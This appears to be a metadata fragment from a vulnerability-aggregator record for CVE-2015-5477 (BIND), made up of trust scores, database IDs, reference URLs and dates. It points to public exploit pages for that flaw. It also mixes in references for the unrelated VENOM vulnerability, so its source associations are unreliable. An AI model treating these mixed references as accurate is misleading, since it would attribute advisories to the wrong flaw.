Trust: 0.6

db:EDBNETid:23565

Trust: 0.6

db:0DAYTODAYid:23960

Trust: 0.6

db:EDBNETid:23577

Trust: 0.6

db:PACKETSTORMid:132926

Trust: 0.5

db:NVDid:CVE-2015-3456

Trust: 0.3

db:BIDid:74640

Trust: 0.3

db:JUNIPERid:JSA10718

Trust: 0.3

db:BIDid:76092

Trust: 0.3

sources: BID: 74640 // BID: 76092 // PACKETSTORM: 132926 // EXPLOIT-DB: 37721 // EDBNET: 58904 // EDBNET: 81117 // EDBNET: 81124 // EDBNET: 23565 // EDBNET: 23577

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2015-5477

Trust: 3.3

url:https://www.intelligentexploit.com

Trust: 1.2

url:https://github.com/robertdavidgraham/cve-2015-5477/blob/34137c71a7fb4e3fa894b045583e67d7b46d62cc/tkill.c

Trust: 1.0

url:https://kb.juniper.net/infocenter/index?page=content&id=jsa10783&cat=sirt_1&actp=list

Trust: 0.6

url:https://www.exploit-db.com/exploits/37721/

Trust: 0.6

url:https://0day.today/exploits/23948

Trust: 0.6

url:https://0day.today/exploits/23960

Trust: 0.6

url:https://rhn.redhat.com/errata/rhsa-2015-1011.html

Trust: 0.3

url:https://www.suse.com/support/update/announcement/2015/suse-su-20150896-1.html

Trust: 0.3

url:https://rhn.redhat.com/errata/rhsa-2015-1001.html

Trust: 0.3

url:https://rhn.redhat.com/errata/rhsa-2015-0999.html

Trust: 0.3

url:https://www.suse.com/support/kb/doc.php?id=7016497

Trust: 0.3

url:https://www.suse.com/support/update/announcement/2015/suse-su-20150889-1.html

Trust: 0.3

url:http://wiki.qemu.org/main_page

Trust: 0.3

url:http://xenbits.xen.org/xsa/advisory-133.html

Trust: 0.3

url:https://www.suse.com/support/update/announcement/2015/suse-su-20150944-1.html

Trust: 0.3

url:http://www-01.ibm.com/support/docview.wss?uid=isg3t1022292

Trust: 0.3

url:http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html

Trust: 0.3

url:http://www.fortiguard.com/advisory/fg-ir-15-012/

Trust: 0.3

url:https://securityblog.redhat.com/2015/05/13/venom-dont-get-bitten/

Trust: 0.3

url:https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04706564

Trust: 0.3

url:https://rhn.redhat.com/errata/rhsa-2015-1031.html

Trust: 0.3

url:http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/archive/hw-438937.htm

Trust: 0.3

url:https://help.joyent.com/entries/68099220-security-advisory-on-venom-cve-2015-3456-in-kvm-qemu

Trust: 0.3

url:https://rhn.redhat.com/errata/rhsa-2015-1004.html

Trust: 0.3

url:https://www-304.ibm.com/connections/blogs/psirt/entry/venom_cve_2015_3456?lang=en_us

Trust: 0.3

url:https://rhn.redhat.com/errata/rhsa-2015-1000.html

Trust: 0.3

url:http://www.huawei.com/en/security/psirt/security-bulletins/security-notices/archive/hw-428704.htm

Trust: 0.3

url:http://seclists.org/bugtraq/2015/may/129

Trust: 0.3

url:https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098681

Trust: 0.3

url:http://support.citrix.com/article/ctx201078

Trust: 0.3

url:https://www.suse.com/support/update/announcement/2015/suse-su-20150889-2.html

Trust: 0.3

url:http://git.qemu.org/?p=qemu.git;a=commit;h=e907746266721f305d67bc0718795fedee2e824c

Trust: 0.3

url:https://www.suse.com/support/update/announcement/2015/suse-su-20150943-1.html

Trust: 0.3

url:http://www-01.ibm.com/support/docview.wss?uid=swg21903743

Trust: 0.3

url:http://venom.crowdstrike.com/

Trust: 0.3

url:http://seclists.org/bugtraq/2015/jul/135

Trust: 0.3

url:https://rhn.redhat.com/errata/rhsa-2015-1513.html

Trust: 0.3

url:http://www-01.ibm.com/support/docview.wss?uid=swg21966274

Trust: 0.3

url:http://www-01.ibm.com/support/docview.wss?uid=nas8n1020890

Trust: 0.3

url:http://seclists.org/oss-sec/2015/q3/233

Trust: 0.3

url:https://support.f5.com/kb/en-us/solutions/public/16000/900/sol16909.html

Trust: 0.3

url:https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04789415

Trust: 0.3

url:https://support.apple.com/en-ie/ht205032

Trust: 0.3

url:http://kb.juniper.net/infocenter/index?page=content&id=jsa10718&actp=rss

Trust: 0.3

url:https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04800156

Trust: 0.3

url:http://www-01.ibm.com/support/docview.wss?uid=swg21964491

Trust: 0.3

url:https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04774040

Trust: 0.3

url:https://www-304.ibm.com/support/docview.wss?uid=swg21963712

Trust: 0.3

url:http://aix.software.ibm.com/aix/efixes/security/bind9_advisory8.asc

Trust: 0.3

url:http://www.isc.org/products/bind/

Trust: 0.3

url:https://kb.netapp.com/support/index?page=content&id=9010056&actp=rss

Trust: 0.3

url:https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04769567

Trust: 0.3

url:http://www.oracle.com/technetwork/topics/security/bulletinjul2015-2511963.html

Trust: 0.3

url:https://www.us-cert.gov/ncas/current-activity/2015/09/16/internet-systems-consortium-isc-releases-security-updates-bind

Trust: 0.3

url:https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04952480

Trust: 0.3

url:http://www.oracle.com/technetwork/topics/security/ovmbulletinjul2016-3090546.html

Trust: 0.3

sources: BID: 74640 // BID: 76092 // PACKETSTORM: 132926 // EXPLOIT-DB: 37721 // EDBNET: 58904 // EDBNET: 81117 // EDBNET: 81124 // EDBNET: 23565 // EDBNET: 23577

SOURCES

db:BIDid:74640
db:BIDid:76092
db:PACKETSTORMid:132926
db:EXPLOIT-DBid:37721
db:EDBNETid:58904
db:EDBNETid:81117
db:EDBNETid:81124
db:EDBNETid:23565
db:EDBNETid:23577

LAST UPDATE DATE

2022-07-27T09:11:51.619000+00:00


SOURCES UPDATE DATE

db:BIDid:74640date:2017-04-18T00:05:00
db:BIDid:76092date:2017-04-18T01:05:00

SOURCES RELEASE DATE

db:BIDid:74640date:2015-05-13T00:00:00
db:BIDid:76092date:2015-07-28T00:00:00
db:PACKETSTORMid:132926date:2015-07-31T13:33:33
db:EXPLOIT-DBid:37721date:2015-08-01T00:00:00
db:EDBNETid:58904date:2015-08-01T00:00:00
db:EDBNETid:81117date:2015-08-01T00:00:00
db:EDBNETid:81124date:2015-08-01T00:00:00
db:EDBNETid:23565date:2015-08-01T00:00:00
db:EDBNETid:23577date:2015-08-04T00:00:00